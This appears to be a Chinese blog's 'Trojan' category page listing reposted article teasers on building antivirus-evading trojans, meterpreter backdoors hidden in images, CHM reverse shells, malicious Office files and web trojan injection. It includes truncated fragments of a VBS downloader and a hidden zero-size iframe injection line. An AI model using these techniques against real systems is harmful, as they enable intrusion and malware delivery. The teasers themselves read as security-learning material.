Loading

文章分类 -  Trojan

摘要:转载自:i春秋社区 原文:http://bbs.ichunqiu.com/thread-18486-1-1.html 本帖最后由 sucppVK 于 2017-1-26 12:40 编辑 一、前言 本文原创作者:sucppVK,本文属i春秋原创奖励计划,未经许可禁止转载! 凭什么只有别人给我们带后门 阅读全文
posted @ 2017-01-30 12:08 ssooking 阅读(728) 评论(0) 推荐(0)
摘要:转载自:http://www.weixianmanbu.com/article/1369.html 很喜欢网上的一篇关于木马编程的文章,让我们这些新手也能有机会去DIY,虽然和牛人们的那些功能强人的木马比起来有些微不足道,但能使用cmd控制肉鸡已经可以做很多事情了,最重要的是不会被杀毒软所查杀,但是 阅读全文
posted @ 2017-01-29 18:22 ssooking 阅读(617) 评论(0) 推荐(0)
摘要:转载自:https://www.cnblogs.com/REscan/p/6306491.html 一、VBS下载者: Set Post = CreateObject("Msxml2.XMLHTTP")Set Shell = CreateObject("Wscript.Shell")Post.Ope 阅读全文
posted @ 2017-01-29 18:18 ssooking 阅读(392) 评论(0) 推荐(0)
摘要:转载自:http://blog.csdn.net/michael_veking 作者:veking 本文的目的是探讨JS相关技术,并不是以杀毒为主要目的,杀毒只是为讲解一些JS做铺垫的,呵呵,文章有点长,倒杯咖啡或者清茶慢慢看,学习切勿急躁! 最近公司的网络中了这两天闹的很欢的ARP病毒,导致大家都 阅读全文
posted @ 2017-01-29 17:08 ssooking 阅读(445) 评论(0) 推荐(0)
摘要:转载自:https://green-m.github.io/2016/11/23/msf-paranoid-mode/ 介绍 在某些环境下,我们需要用到meterpreter的偏执模式(paranoid mode)。 偏执模式在面对接受的请求很多的时候,可以有效过滤筛选回连的请求,只留下自己所需要的 阅读全文
posted @ 2016-12-17 19:29 ssooking 阅读(659) 评论(0) 推荐(0)
摘要:转载自:http://blog.csdn.net/my_king_freedom/article/details/17228679 一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<ifram 阅读全文
posted @ 2016-12-14 21:17 ssooking 阅读(1192) 评论(0) 推荐(0)
摘要:原文:http://www.freebuf.com/articles/system/119874.html 序 某日嶽兄激动的说他的chm自动反弹shell做好了,急匆匆的拿我们测试,结果…一定是出bug了,我看了下演示(对不起,我实在编不下去了)。文章给出最终版代码,测试的心酸撸主右手可以作证。 阅读全文
posted @ 2016-12-13 19:53 ssooking 阅读(1553) 评论(0) 推荐(0)
摘要:转载自:http://bobao.360.cn/learning/detail/3256.html 前言 在这篇文章中,我将教大家如何将类似于 meterpreter 的后门脚本代码插入到图片中,利用图片来对其进行伪装。话不多说,下面我们来动手操作! Step 1 创建 Payload Part I 阅读全文
posted @ 2016-12-08 13:09 ssooking 阅读(3351) 评论(0) 推荐(0)
摘要:来自:http://www.freebuf.com/sectool/118714.html Green_m 2016-11-06 共170775人围观 ,发现 13 个不明物体 工具系统安全 来自:http://www.freebuf.com/sectool/118714.html Green_m 阅读全文
posted @ 2016-11-30 17:46 ssooking 阅读(1305) 评论(0) 推荐(0)
摘要:来源:http://www.mottoin.com/90302.html 在渗透测试期间,目标服务器如果是Windows的,目标服务器可能安装有JAVA版管理管理控制程序(例如:WAS、JBOSS和Tomcat),该服务器具有默认或者是可猜测(可以进行爆破攻击)的管理凭据。 一种思路是上传一个Met 阅读全文
posted @ 2016-11-06 18:19 ssooking 阅读(371) 评论(0) 推荐(0)
摘要:原文地址:http://drops.wooyun.org/tips/8568 0x00 简介 Powershell是windows下面非常强大的命令行工具,并且在windows中Powershell可以利用.NET Framework的强大功能,也可以调用windows API,在win7/serv 阅读全文
posted @ 2016-11-05 14:22 ssooking 阅读(651) 评论(0) 推荐(0)
摘要:原文地址:http://drops.wooyun.org/tips/13246 Office作为Windows平台下一种非常流行的办公软件,越来越多的APT攻击通过构造恶意Office文件来进行实施,这也是成功率也是比较高的一种攻击方式。当然最隐蔽,最有效的攻击方式就是通过Office办公套件的一些 阅读全文
posted @ 2016-11-05 14:18 ssooking 阅读(287) 评论(0) 推荐(0)